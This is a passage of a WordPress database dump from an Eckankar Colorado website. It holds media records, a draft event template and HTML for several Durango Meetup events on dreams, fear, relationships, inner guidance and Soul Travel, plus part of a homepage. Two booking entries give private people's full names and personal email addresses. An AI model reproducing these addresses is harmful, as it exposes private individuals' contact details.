11:45:00','2022-08-21 17:45:00','','Colleyna Danler - colleynadanler@hotmail.com','','publish','closed','closed','','colleyna-danler-colleynadanlerhotmail-com','','','2022-08-21 11:45:00','2022-08-21 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267048',0,'mec-books','',0),(267050,15,'2022-08-20 08:10:51','2022-08-20 14:10:51','','BecomeALightBanner','','inherit','closed','closed','','becomealightbanner','','','2022-08-20 08:10:51','2022-08-20 14:10:51','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/08/BecomeALightBanner.jpg',0,'attachment','image/jpeg',0),(267051,15,'2022-08-20 08:11:25','2022-08-20 14:11:25','','BecomeALightQuote','','inherit','closed','closed','','becomealightquote','','','2022-08-20 08:11:25','2022-08-20 14:11:25','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/08/BecomeALightQuote.jpg',0,'attachment','image/jpeg',0),(267053,15,'2022-08-20 08:29:28','2022-08-20 14:29:28','','2022 - ESC October Soul Adventure - bkgnd-1','','inherit','closed','closed','','2022-esc-october-soul-adventure-bkgnd-1','','','2022-08-20 08:29:28','2022-08-20 14:29:28','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/08/2022-ESC-October-Soul-Adventure-bkgnd-1.jpg',0,'attachment','image/jpeg',0),(267054,15,'2022-08-20 08:30:39','2022-08-20 14:30:39','','2022 - ESC October Soul Adventure - image-text-2','','inherit','closed','closed','','2022-esc-october-soul-adventure-image-text-2','','','2022-08-20 08:30:39','2022-08-20 14:30:39','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/08/2022-ESC-October-Soul-Adventure-image-text-2.png',0,'attachment','image/png',0),(267060,2,'2022-08-20 13:51:55','2022-08-20 19:51:55','','harold-10','','inherit','closed','closed','','harold-10','','','2022-08-20 13:51:55','2022-08-20 19:51:55','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/08/harold-10.jpg',0,'attachment','image/jpeg',0),(267076,0,'2022-08-21 09:37:20','2022-08-21 15:37:20','','','','publish','closed','closed','','267076','','','2022-08-21 09:37:20','2022-08-21 15:37:20','',0,'https://eckankar-colorado.org/nf_sub/267076/',0,'nf_sub','',0),(267087,1000036,'2022-09-04 10:30:00','2022-09-04 16:30:00','','Carolyn Graff - zgraff@charter.net','','publish','closed','closed','','carolyn-graff-zgraffcharter-net-7','','','2022-09-04 10:30:00','2022-09-04 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267087',0,'mec-books','',0),(267092,2,'2023-01-07 20:56:11','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div><span class=\"\"><strong><span style=\"font-size: 14pt;\">&nbsp;-- This event is for chelas who have completed \'Arahata Training\' --</span></strong><br>\r\n</span></div>\r\n<div><span class=\"\"><strong>&nbsp;</strong></span></div>\r\n<div>\r\n<p class=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Greetings Arahatas!</span></strong></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-left-width: 4px; border-color: #086eac;\">\r\n<p><span style=\"font-size: 14pt;\">\"<em>You are the ECK Arahata. You want to tower above the disciplines of </em><em>matter, emotions and mind. Your standing as a teacher in ECK is based upon the Mahanta, the Living ECK Master. As a student of life, you simply present the teachings of ECK to those who want them.</em>\"&nbsp;&nbsp; <span style=\"font-size: 12pt;\">—Sri Harold Klemp, ECK Arahata Book (2015 edition), pp. 42-43</span></span></p>\r\n</blockquote>\r\n<span class=\"\" style=\"font-size: 14pt;\">You’re cordially invited to attend one or more Arahata Circles to both refresh and refine your skills as well as to connect and share with the community of ECK Arahatas. In addition to Satsang classes, book studies, Meetups and ECK events, arahata skills are daily life skills that help lead seekers to ECK. Attendance at a yearly Arahata Circle is recommended but not required for all chelas who have completed Arahata Training. </span></div>\r\n<div></div>\r\n<div><span class=\"\" style=\"color: #23507d;\"><strong><span class=\"\" style=\"font-size: 16pt;\">See the current Colorado ‘Chela’ Newsletter for login information.</span></strong></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Arahata Circle for Colorado and Utah - Online ---TEMPLATE --ONLY FOR MEMBER CALENDARS','','draft','closed','closed','','','','','2023-01-07 20:56:11','2023-01-08 03:56:11','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267092',0,'mec-events','',0),(267101,15,'2022-08-27 09:12:38','2022-08-27 15:12:38','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you wonder what\'s next when our physical body dies?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Are you curious about loved ones who have already passed on?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to visit the inner heavens while you are still alive?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event will help you gain new perspectives on</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">seeing heaven before you die</span></li>\r\n	<li><span style=\"font-size: 14pt;\">meeting with departed loved ones</span></li>\r\n	<li><span style=\"font-size: 14pt;\">near-death experiences</span></li>\r\n	<li><span style=\"font-size: 14pt;\">help from spiritual guides</span></li>\r\n	<li><span style=\"font-size: 14pt;\">and dealing with grief</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Please visit the <a class=\"link\" href=\"https://www.eckankar.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar website </a>for more information about Eckankar.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/288016223/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current La Plata County guidelines for all in person events. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - In Person<br>\'Life After Death\'','','publish','closed','closed','','meetup-in-personlife-after-death-2','','','2022-08-27 09:13:30','2022-08-27 15:13:30','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267101',0,'mec-events','',0),(267102,15,'2022-08-27 09:20:30','2022-08-27 15:20:30','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to better understand and learn from your dreams?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Are you interested in techniques to help you remember your dreams?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you want to explore the spiritual nature of dreams?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will discuss tips for dream discovery, recovery, and interpretation from a spiritual perspective. Your dream meaning can be disguised using its own unique symbols. You can create your own dream dictionary to learn the meaning of the symbols to you.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book ECK Wisdom on Dreams, “Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.”</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To learn more about dreams visit </span><span style=\"font-size: 14pt;\"><a class=\"link\" href=\"https://www.eckankar.org/experience/dreams\" target=\"_blank\" rel=\"nofollow noopener ugc\">Dreams and Their Spiritual Meaning</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/288016400/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current La Plata County guidelines for all in person events. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - In Person<br>\'Spiritual Dreaming\'','','publish','closed','closed','','meetup-in-personspiritual-dreaming','','','2022-08-27 09:20:30','2022-08-27 15:20:30','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267102',0,'mec-events','',0),(267103,15,'2022-08-27 09:28:47','2022-08-27 15:28:47','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to face the world with more love and less fear?</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book \"<em>ECK Wisdom on Conquering Fear\"</em></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\"When fear is the dominant player in your life, it steals the joy and freedom of living.\"</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come and join other spiritual seekers as we explore conquering fear from a higher perspective. What if the antidote to fear lay within easy distance? Would you reach for it often?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Are you interested in techniques to help you move beyond your fears and create your life from a place of courage and wisdom?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this discussion we will take a look at the keys to overcoming fear. The discussion will be based on the book by Harold Klemp titled \"<em>ECK Wisdom on Conquering Fear</em>.\" This book will be given as a gift to all new attendees.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">These events are sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To learn more about Eckankar, visit the </span><span style=\"font-size: 14pt;\"><a class=\"link\" href=\"https://www.eckankar.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar website</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/288019320/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current La Plata County guidelines for all in person events. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - In Person<br>\'Conquering Fear\'','','publish','closed','closed','','meetup-in-personconquering-fear','','','2022-08-27 09:28:47','2022-08-27 15:28:47','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267103',0,'mec-events','',0),(267104,15,'2022-08-27 09:24:07','2022-08-27 15:24:07','','BrightLight','','inherit','closed','closed','','brightlight','','','2022-08-27 09:24:07','2022-08-27 15:24:07','',267103,'https://eckankar-colorado.org/wp-content/uploads/2022/08/BrightLight.webp',0,'attachment','image/webp',0),(267105,15,'2022-08-27 09:38:56','2022-08-27 15:38:56','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find the answers to common questions of the heart, including the truth about soul mates, how to strengthen a marriage, and how to know if a partnership is worth developing.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will discover:</span><br>\r\n<span style=\"font-size: 14pt;\">• The source of love</span><br>\r\n<span style=\"font-size: 14pt;\">• The secret of all relationships</span><br>\r\n<span style=\"font-size: 14pt;\">• How to love yourself</span><br>\r\n<span style=\"font-size: 14pt;\">• How to find solace when a loved one dies</span><br>\r\n<span style=\"font-size: 14pt;\">• Your bond of love with all life</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions in this open discussion.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join us for this lively discussion about the spiritual side of relationships.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">No admission fee; just come and enjoy.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">When you attend you will be given a free copy of the booklet \'<em>Spiritual Wisdom on Relationships</em>\'. It is a key for anyone wanting more love to give, more love to get. It\'s a key to better relationships with everyone in your life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path to Spiritual Freedom as a community service for people of all faiths and beliefs.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">For more information about ECKANKAR, check out:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"link\" href=\"https://www.eckankar.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar Website</a></span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"link\" href=\"https://www.eckankar.org/blog/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar Blog</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/288038603/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current La Plata County guidelines for all in person events. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - In Person<br>\'Relationships a Spiritual Discussion\'','','publish','closed','closed','','meetup-in-personrelationships-a-spiritual-discussion','','','2022-08-27 09:38:56','2022-08-27 15:38:56','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267105',0,'mec-events','',0),(267106,15,'2022-08-27 09:44:39','2022-08-27 15:44:39','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• How do you recognize the voice of your own Inner Guidance?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• What are some of the tools you use to navigate daily challenges?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• Once you’ve chosen your next step, how do you act on it?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are welcome to join us and discover what others have learned as they face the ongoing challenges of life. We will share tools that can help you hear your own Inner Guidance, and ways to access it daily, in every moment.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Often people are afraid to follow their inner guidance. It sounds like such a foolish thing to do, especially if they have to face other people and explain why they are doing what they are doing. One of the very strong pressures in life is the social consciousness: What will people think? What will people say?”—Harold Klemp, <em>ECK Wisdom on Inner Guidance</em>, p. 5</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p><span class=\"\" style=\"font-size: 14pt;\">For more information about ECKANKAR, check out:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"link\" href=\"https://www.eckankar.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar Website</a></span><br>\r\n<span class=\"\" style=\"font-size: 14pt;\"><a class=\"link\" href=\"https://www.eckankar.org/blog/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar Blog</a></span></p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out&nbsp;<a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/288038688/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current La Plata County guidelines for all in person events. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - In Person<br>\'Following Your Inner Guidance\'','','publish','closed','closed','','meetup-in-personfollowing-your-inner-guidance','','','2022-08-27 09:44:39','2022-08-27 15:44:39','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267106',0,'mec-events','',0),(267108,15,'2022-08-27 09:53:15','2022-08-27 15:53:15','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this Meetup, you will learn how to recognize your Soul Travel experiences, benefit from them in your daily life, and awaken to more of the love, wisdom, and creative powers that are already within your heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Soul Travel is a shift in awareness, a change in consciousness, moving closer to God. Although in truth, Soul doesn’t actually “go” anywhere, Soul Travel describes&nbsp;<strong>the experience of accepting greater states of being.</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Broadening your viewpoint from even higher vantage points brings upliftment, problem-solving skills, and endless opportunity for spiritual adventure. A close cousin to dreaming, Soul Travel is a natural ability.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Bring your questions, comments, and experiences to discuss how to expand your awareness naturally and explore the unlimited worlds of Soul.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual Experiences Group of Durango Meetup is for people of all faiths and beliefs. Eckankar is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p><span class=\"\" style=\"font-size: 14pt;\">For more information about ECKANKAR, check out:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"link\" href=\"https://www.eckankar.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar Website</a></span><br>\r\n<span class=\"\" style=\"font-size: 14pt;\"><a class=\"link\" href=\"https://www.eckankar.org/blog/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar Blog</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/288039267/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current La Plata County guidelines for all in person events. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - In Person<br>\'A Journey Like No Other: Soul Travel\'','','publish','closed','closed','','meetup-in-persona-journey-like-no-other-soul-travel','','','2022-08-27 09:53:15','2022-08-27 15:53:15','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267108',0,'mec-events','',0),(267110,0,'2022-08-28 12:52:36','2022-08-28 18:52:36','','','','publish','closed','closed','','267110','','','2022-08-28 12:52:36','2022-08-28 18:52:36','',0,'https://eckankar-colorado.org/nf_sub/267110/',0,'nf_sub','',0),(269411,2,'2023-11-21 09:29:15','2023-11-21 16:29:15','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px; margin-top: 9px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" 